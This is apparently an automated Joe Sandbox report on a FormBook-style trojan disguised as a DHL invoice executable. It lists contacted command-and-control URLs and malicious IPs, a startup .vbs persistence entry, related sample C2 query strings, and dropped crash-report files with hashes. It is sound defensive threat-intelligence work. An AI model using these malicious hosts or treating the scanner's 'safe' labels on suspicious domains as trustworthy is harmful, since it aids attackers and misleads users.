http://www.mvtb.pics/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sctttc-or.top/jd21/www.solveiterzsolutions.fun	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hm23s.topReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alqahtani.siteReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apple0ficial-ld.infoReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gkbet168.netReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forklift-jobs-29768.bondReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xmld101.icu/jd21/www.nextdoor3.store	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS~	explorer.exe, 00000004.00000002.2355211941.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.emiratesnseic.topReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.emiratesnseic.top/jd21/www.030002787.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.frametoryframes.shopReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dating-dd-de.info	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dating-dd-de.info/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.borghardt.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.joycasino-ed46.topReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alqahtani.site/jd21/	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gkbet168.net	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2355211941.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.weight-loss-003.today/jd21/www.emiratesnseic.top	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tyumk.xyz/jd21/www.badcreditloans59.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.alqahtani.site/jd21/www.circusenergy.online	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.weight-loss-003.today/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.45941978.topReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.emiratesnseic.top	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000004.00000000.1457725429.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.0000000009239000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.circusenergy.online	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mvtb.pics/jd21/www.apple0ficial-ld.info	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.frametoryframes.shop/jd21/www.dating-dd-de.info	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.therealtorpeddler.info	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.therealtorpeddler.infoReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.forklift-jobs-29768.bond	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/who-is-andy-biggs-what-to-know-about-the-arizona-republican-	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cellphonesfxw.todayReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.53.179.91	www.authentication-app-69447.bond	Germany		61969	TEAMINTERNET-ASDE	true
154.23.184.95	hm23s.top	United States		174	COGENT-174US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1489834
Start date and time:	2024-08-08 07:40:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@246/17@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 52 Number of non-executed functions: 289
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.149, 2.23.209.142, 2.23.209.148, 2.23.209.144, 2.23.209.143, 2.23.209.158, 2.23.209.156, 2.23.209.150, 2.23.209.154, 2.23.209.133, 2.23.209.140, 2.23.209.141, 2.23.209.131, 2.23.209.130, 2.23.209.135, 2.23.209.132
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, r.bing.com, api-msn-com.a-0003.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:41:09	API Interceptor	2201706x Sleep call for process: explorer.exe modified
07:41:13	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.53.179.91	MKCC-MEC-RFQ-115-2024.exe	Get hash	malicious	FormBook	Browse	www.gb-electric-wheelchairs-8j.bond/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ
	2024 Lusail Fence-WITH STICKER-2-003.exe	Get hash	malicious	FormBook	Browse	www.gb-electric-wheelchairs-8j.bond/ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L
	RFQINL0607_Commerical_list.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.pingpongtable-sg.bond/fg83/?IpZXsVy=vgcZVq2vlo6tIZLwBMCb9IR7Fd0F2pwxk1GGseMFxnAAiVZXKfn9ZK8RnpW3pp9l3vJN&kxopsN=MlyXbd0X
	Scan_Doc.vbs	Get hash	malicious	FormBook	Browse	www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD
	ekstre_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
	E-DEKONT_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?w88pk=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&Sr94=9rXXvvGp

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	PURCHASE ORDER170624.exe	Get hash	malicious	FormBook	Browse	38.181.21.123
	http://guqtg.frooskivpn.com/4guusj15181vCAj1127elpjnhawbx14030EJAOJSTOQCIWNIN24527KYKP17651B16#l8054dcdz5aasx7h9lz4sls75gk825optascqsrhl95ahyhhm7	Get hash	malicious	Phisher	Browse	154.62.105.142
	arm5-20240807-1021.elf	Get hash	malicious	Mirai	Browse	38.83.59.14
	x86.elf	Get hash	malicious	Unknown	Browse	149.113.123.228
	Document 240000807.exe	Get hash	malicious	FormBook	Browse	154.23.184.141
	SecuriteInfo.com.Trojan.MSIL.Injector.13809.31159.exe	Get hash	malicious	FormBook	Browse	154.40.37.235
	botx.x86.elf	Get hash	malicious	Mirai	Browse	38.73.2.131
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	38.116.142.121
	botx.mips.elf	Get hash	malicious	Mirai	Browse	38.100.71.68
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	38.138.245.238
TEAMINTERNET-ASDE	DHL SHIPPING DOCUMENT.exe	Get hash	malicious	FormBook	Browse	185.53.179.93
	DHL SHIPPING DOCUMENT.exe	Get hash	malicious	FormBook	Browse	185.53.179.93
	counter.exe	Get hash	malicious	Bdaejec	Browse	185.53.178.50
	http://myuhnj.org	Get hash	malicious	Unknown	Browse	185.53.177.52
	CSCEC Middle East (L.L.C).exe	Get hash	malicious	FormBook	Browse	185.53.179.94
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	185.53.178.6
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	185.53.178.52
	DHL_TOC2_2407081728458457.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.93
	Akb38lKYd6rDV8l.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	http://le100.net	Get hash	malicious	Unknown	Browse	185.53.179.170

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_bd5b50a3-dcf6-43d1-9dc9-f012b59befb7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3047172103944074
Encrypted:	false
SSDEEP:	384:dsCmL3BxwjA2at2gCR0CPzzuiFXY4lO8k:dsv3BxwjCtpw0QzzuiFXY4lO8
MD5:	F8D35DDA68CDD5A731B343672C1DEB7D
SHA1:	7B29EC032BFB4CB2752D814CE4690182537C2CA2
SHA-256:	E31C9459D23B360E82B9644A8ADEAA435BC9D525A424CE975AE66C59D8928719
SHA-512:	FA362B1D96749BA433BC30BBD5EE0B32D8584BA86F192FEA31FF9EFCE3712B7426B294074259092B91FDBF5E04FD9CBB4CAF6BCA53DCD245AE07ADAC07EAC31B
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.5.6.9.3.5.6.6.7.9.7.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.5.b.5.0.a.3.-.d.c.f.6.-.4.3.d.1.-.9.d.c.9.-.f.0.1.2.b.5.9.b.e.f.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.4.f.2.a.2.8.-.f.9.b.9.-.4.5.1.3.-.9.9.a.f.-.0.8.6.6.8.7.1.1.2.7.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.4.-.0.0.0.1.-.0.0.1.4.-.2.3.b.1.-.3.e.5.5.4.6.e.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER353D.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, Thu Aug 8 05:42:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1097368
Entropy (8bit):	1.3775605199157
Encrypted:	false
SSDEEP:	1536:BDJiGcq/uPhgsHsVi5K1MJn9aC0tUrvs5/Y9plY5v70WtpBU:qGcq/agsd5KwVvsalUY
MD5:	FDBB1E497D28E614856DC18005FE888F
SHA1:	E59F99884BE12B32C8D166D11FE835305522BDAD
SHA-256:	2B402E04CE4F27725772A3541C744BF6F34960D13A58CD297EC4F4BD4E9D3A0D
SHA-512:	275D51F7A2373B1DBC3287477DD5F262332731403FFCB06C23BCE44C0B5BE4C4B3E134F6C7BCA3FC107C55C312F333A7299F061E7C974E09B3F08E022B530819
Malicious:	false
Preview:	MDMP..a..... ........Z.f................ .......,k..@...........l...........H.......4.... ..........x.......8...........T...$........c...Z..................................................................................................................eJ..............Lw......................T............@.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39D2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10848
Entropy (8bit):	3.701144529395122
Encrypted:	false
SSDEEP:	192:R6l7wVeJCMim6YSL2gmfqzV/prs89bBJjssXXfhsrm:R6lXJZ96Y+2gmfqzVbBJj3XXf7
MD5:	B231373CE5FD9E4A9070C07200990CE0
SHA1:	AA23105D7FBC23CF40CD8667179A477A675114A0
SHA-256:	48EA2793A7E6A32C4BB2AAFEDE54C36D332677494F8BAE53CA7B8FADE3A4DAB6
SHA-512:	D0773E092803024E10D1550EF1C05AB6AE8A661985673C175219B069A7C1B1382FF5D31ED00F881F13E744F9FE47FE637454F9118E0CF6687318D5356ABD16DD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A12.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.4645528479159635
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaCJg771I9LgWpW8VYUWYm8M4JYmFmsyq85cdykb9Q32d:uIjffI7UZ7VPJus5ba32d
MD5:	DD88BEEF11A98846FFA9BA383E42EAF8
SHA1:	16684BB090CF8A18A4926B44969740ED8106EB83
SHA-256:	A2639A0ACE126110EEAF0FA7876051D29D5C0E8673615F2184764B20952929C3
SHA-512:	BFF9D6E0B33E21DBC897B3F085346EAD44DDDDF92B01B32161F3117F402384BF54C1A1C265DE63591DDBE8B9784B7989D4890E6B8FC45C8C491B4E4DEB190F9A
Malicious:	false
